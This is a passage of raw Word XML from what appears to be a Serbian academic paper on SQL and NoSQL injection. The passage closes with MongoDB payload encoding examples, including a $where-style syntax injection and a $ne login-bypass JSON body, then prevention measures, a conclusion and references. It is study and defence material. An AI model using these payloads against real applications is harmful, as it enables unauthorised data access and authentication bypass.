          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operatora</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Potrebno je napomenuti da format i tip enkodiranja pri generisanju payload-a može zavisiti od mesta u kome se on nalazi, konkretno:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000260">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se payload prosleđuje kroz URL parametre (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> zahtev), potrebno je koristiti URL-enkodiranje specijalnih karaktera kao što su razmak i logički operatori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gde bi payload kao što je </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fizzy' || this.released == 0 || 'a'=='b</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bio konvertovan u sledeći oblik:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000261">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ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fizzy'%20&amp;&amp;%201%20&amp;&amp;%20'x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026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 se operatori mogu definisati korišćenjem uglastih zagrada, na primer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000263">
      <w:pPr>
        <w:ind w:firstLine="720"/>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color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fizzy'%20%7C%7C%20this.released%20==%200%20%7C%7C%20'a'=='b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000264">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se payload prosleđuje kroz ,,telo’’ (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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HTTP zahteva, potrebno je koristiti </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> format sa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> header-om, na primer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000265">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>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ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "username": {"$ne": "invalid"}, "password": {"$ne": "invalid"} }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000266">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fct5uu42xpzq" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Prevencija NoSQLi napada</w:t>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14] Principi prevencije NoSQLi napada se u velikoj meri baziraju na principima prevencije SQLi napada, najpre korišćenjem parametrizovanih upita, te i sanitizacije i validacije korisničkog unosa. Međutim, s obzirom da NoSQL baze podataka koriste sopstvene implementacije query jezika, potrebno je ispratiti preporuke korišćene tehnologije.</w:t>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Ključne mere zaštite uključuju:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026A">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Stroga validacija korisničkog unosa i odbacivanje ugnježdenih objekata, nizova ili neočekivanih polja koja bi mogla sadržati operatore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026B">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Blokiranje operatora - gde se u MongoDB sistemu preporučuje korišćenje </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$eq </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">operatora umesto jednakosti u cilju sprečavanja izvršenja umetnutih operatora </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ne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ili </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$regex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">U slučaju MongoDB baze podataka, jedan od ključnih mehanizama zaštite je onemogućavanje izvršavanja JavaScript koda u okviru operatora kao što je </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$where</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> navođenjem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--noscripting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> opcije unutar MongoDB konfiguracije</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">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Konekcije ka bazi podataka treba konfigurisati sa korisničkim nalozima koji poseduju minimalne privilegije neophodne za izvršavanje operacija</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">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Implementiranje log-ovanja radi detekcije neobičnih upita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026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pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3w9vnvf0wtw" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. ZAKLJUČAK</w:t>
      </w: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drugom poglavlju ovog rada su prikazane vrste SQL Injection napada, jedan od najrasprostranjenijih tipova napada koji predstavljaju značajnu pretnju modernim aplikacijama, uključujući i način na koji je moguće otkriti potencijalne ranjivosti. Demonstrirani su napadi na logiku upita kroz otkrivanje skrivenih podataka, zaobilaženje aplikativne logike, kao i specifične Blind SQLi tehnike. Dodatno, razmotrene su mogućnosti manipulacije bazom podataka i izvršavanja proizvoljnog koda preko SQLi ranjivosti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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trećem poglavlju su obrađeni NoSQL Injection napadi, sa fokusom na MongoDB bazu podataka. Demonstrirane su dve glavne kategorije napada: Syntax Injection, gde se narušava sintaksa originalnog upita u cilju promene logike ili ekstrakcije podataka, kao i Operator Injection napadi gde se koriste NoSQL-specifični operatori u maliciozne svrhe. Posebna pažnja je posvećena opasnosti </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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operatora koji omogućuje izvršavanje proizvoljnog JavaScript koda.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Zaključuje se da, iako SQL i NoSQL baze podataka koriste različite arhitekture i query jezike, fundamentalni principi Injection napada ostaji konceptualno isti, gde u oba slučaja napadač pokušava da manipuliše logikom upita umetanjem malicioznog sadržaja kroz nekontrolisane korisničke unose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Prevencija ovakvih napada zahteva primenu većeg broja mehanizama i rešenja koji uključuju strogu validaciju i sanitizaciju korisničkog unosa, korišćenje parametrizovanih upita, primenu principa najmanjeg nivoa privilegija za pristup bazi podataka, kao i redovno testiranje i pregled log-ova sistema. S obzirom na razvoj tehnologija i pojavu novih tehnika napada, neophodno je kontinualno primenjivati odbrambene mehanizme radi očuvanja integriteta, poverljivosti i dostupnosti podataka u savremenim sistemima.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8qavxoj7xu7v" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. LITERATURA</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10: </w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://owasp.org/Top10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Poslednji pristup: 02.11.2025. godine)</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 - A03:2021 - Injection: </w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://owasp.org/Top10/A03_2021-Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Poslednji pristup: 02.11.2025. godine)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OWASP - Testing for SQL Injection: </w:t>
      </w:r>
      <w:hyperlink r:id="rId52">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection</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PortSwigger - SQL Injection: </w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://portswigger.net/web-security/sql-injection</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W3Schools - SQL UNION Operator: </w:t>
      </w:r>
      <w:hyperlink r:id="rId54">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.w3schools.com/sql/sql_union.asp</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PostgreSQL - Columns: </w:t>
      </w:r>
      <w:hyperlink r:id="rId55">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.postgresql.org/docs/current/infoschema-columns.html</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PostgreSQL - pg_roles: </w:t>
      </w:r>
      <w:hyperlink r:id="rId56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.postgresql.org/docs/current/view-pg-roles.html</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Oracle - Scalar Subquery Expressions: </w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://docs.oracle.com/en/database/oracle/oracle-database/23/sqlrf/Scalar-Subquery-Expressions.html</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Datacamp - SQL Subquery: A Comprehensive Guide: </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.datacamp.com/tutorial/sql-subquery</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PortSwigger - Out-of-band application security testing (OAST): </w:t>
      </w:r>
      <w:hyperlink r:id="rId59">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://portswigger.net/burp/application-security-testing/oast</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RAPID7 - Remote Code Execution (RCE): </w:t>
      </w:r>
      <w:hyperlink r:id="rId60">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.rapid7.com/fundamentals/what-is-remote-code-execution-rce</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DbVisualizer - Parameterized Queries in SQL – A Guide: </w:t>
      </w:r>
      <w:hyperlink r:id="rId61">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.dbvis.com/thetable/parameterized-queries-in-sql-a-guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Poslednji pristup: 02.11.2025. godine)</w:t>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Portswigger - NoSQL Injection: </w:t>
      </w:r>
      <w:hyperlink r:id="rId62">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://portswigger.net/web-security/nosql-injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Poslednji pristup: 02.11.2025. godine) </w:t>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Datacamp - Preventing SQL/NoSQL Injection Attacks in MongoDB: </w:t>
      </w:r>
      <w:hyperlink r:id="rId63">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.datacamp.com/tutorial/preventing-sql-no-sql-injection-attacks-in-mongo-db</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Poslednji pristup: 02.11.2025. godine)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId64" w:type="default"/>
      <w:headerReference r:id="rId65" w:type="first"/>
      <w:footerReference r:id="rId66" w:type="default"/>
      <w:footerReference r:id="rId6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Niš, novembar 2025. god.</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AC">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sqlmap: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sqlmap.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AD">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Burp Suite: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://portswigger.net/burp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
